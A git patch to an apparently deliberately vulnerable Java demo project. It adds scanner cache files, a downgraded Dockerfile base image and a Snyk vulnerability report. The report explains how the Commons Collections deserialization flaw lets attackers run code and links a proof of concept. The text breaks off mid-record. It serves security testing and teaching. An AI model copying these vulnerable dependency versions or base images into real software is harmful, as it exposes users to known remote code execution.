From 4b11ae9a8370eb5cb8c5fc3ae8a8d0f9179fd4b2 Mon Sep 17 00:00:00 2001
From: dollav <146855949+dollav@users.noreply.github.com>
Date: Tue, 4 Mar 2025 08:55:34 -0500
Subject: [PATCH] lgtm
lgtm
---
.dccache | 1 +
.vscode/settings.json | 3 +-
Dockerfile | 6 +-
html.html | 493 +++++
log4shell-goof/log4shell-server/filter.yaml | 5 +
.../log4shell-server/filtered_data.json | 735 +++++++
log4shell-goof/log4shell-server/pom.xml | 10 +-
log4shell-goof/log4shell-server/result.json | 1778 +++++++++++++++++
log4shell-goof/log4shell-server/result22.json | 1778 +++++++++++++++++
log4shell-goof/log4shell-server/settings.xml | 13 +
testDOcker | 6 +
todolist-goof/{pom.xml => test-pom.xml} | 0
todolist-goof/todolist-core/.snyk | 19 +
todolist-goof/todolist-core/pom.xml | 6 +-
14 files changed, 4840 insertions(+), 13 deletions(-)
create mode 100644 .dccache
create mode 100644 html.html
create mode 100644 log4shell-goof/log4shell-server/filter.yaml
create mode 100644 log4shell-goof/log4shell-server/filtered_data.json
create mode 100644 log4shell-goof/log4shell-server/result.json
create mode 100644 log4shell-goof/log4shell-server/result22.json
create mode 100644 log4shell-goof/log4shell-server/settings.xml
create mode 100644 testDOcker
rename todolist-goof/{pom.xml => test-pom.xml} (100%)
create mode 100644 todolist-goof/todolist-core/.snyk
diff --git a/.dccache b/.dccache
new file mode 100644
index 0000000000..6e29e74a9f
--- /dev/null
+++ b/.dccache
@@ -0,0 +1 @@
+{"/Users/austindoll/Documents/GitHub/java-goof/html.html":[14127,1731615925112.2375,"1cd39ebace4e366330db5636b2153eaa124f93b09658646ac9dc7ed87cfd3418"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1736357283533.9795,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[1267,1727108004837.6245,"9b760e3a00be740cea3ab01cafcef373c9d916e66523130761de7849b6fd4b48"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/test-pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[3623,1727961465852.6384,"f5294611a4a8bb2d438872634d5b88224dfbd5e5845ec9ec1b18998523260b54"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/settings.xml":[493,1727181223648.331,"0576ecaf2c3ff965846b2e00a6d9e1aa480da587cc802485a60ffd8fb5b3c641"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/zip-slip.py":[408,1707749068007.4468,"a818fc2527938e1da045c776d60ba3816f6895a2cc3c704d533f6a18376bebf1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/.snyk":[668,1736363959894.3958,"55907a82b23e72e1f90498c52ec77d6005ed9424e3e526222f05f31843b4865e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[4148,1728324667956.4253,"1e1afe4ec63885225a2423f7f63db64ce0557e6dea7cc3d14610ff85a64c7f52"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1734026546247.283,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]}
\ No newline at end of file
diff --git a/.vscode/settings.json b/.vscode/settings.json
index e0f15db2eb..64d656bf15 100644
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@@ -1,3 +1,4 @@
{
- "java.configuration.updateBuildConfiguration": "automatic"
+ "java.configuration.updateBuildConfiguration": "automatic",
+ "snyk.advanced.organization": "f40682bc-241b-4e08-8320-28b3bd169ec9"
}
\ No newline at end of file
diff --git a/Dockerfile b/Dockerfile
index 197a015e39..5d1c25366c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,6 +1,4 @@
-From python:3.10.12-slim
+FROM python:3.7-slim-bullseye
RUN apt-get update
-RUN apt-get install libkrb5support0 -y
-
-RUN ["sleep", "1"]
+RUN apt install linux-libc-dev
diff --git a/html.html b/html.html
new file mode 100644
index 0000000000..2073345708
--- /dev/null
+++ b/html.html
@@ -0,0 +1,493 @@
+
+
+
+
+
+
+
+
+ Snyk test report
+
+
+
+
+
+
+
+
+
+
+
+
+
+ No known vulnerabilities detected.
+
+
+
+
+
+
diff --git a/log4shell-goof/log4shell-server/filter.yaml b/log4shell-goof/log4shell-server/filter.yaml
new file mode 100644
index 0000000000..6824479d53
--- /dev/null
+++ b/log4shell-goof/log4shell-server/filter.yaml
@@ -0,0 +1,5 @@
+version: 2
+customFilters:
+ filter: ".vulnerabilities |= map(if (.disclosureTime < (now - (3000 * 86400) | todateiso8601)) then . else empty end)"
+ pass: "[.vulnerabilities[] | select(.severity == \"low\")] | length"
+ msg: "Vulnerabilities found"
\ No newline at end of file
diff --git a/log4shell-goof/log4shell-server/filtered_data.json b/log4shell-goof/log4shell-server/filtered_data.json
new file mode 100644
index 0000000000..09649c3730
--- /dev/null
+++ b/log4shell-goof/log4shell-server/filtered_data.json
@@ -0,0 +1,735 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
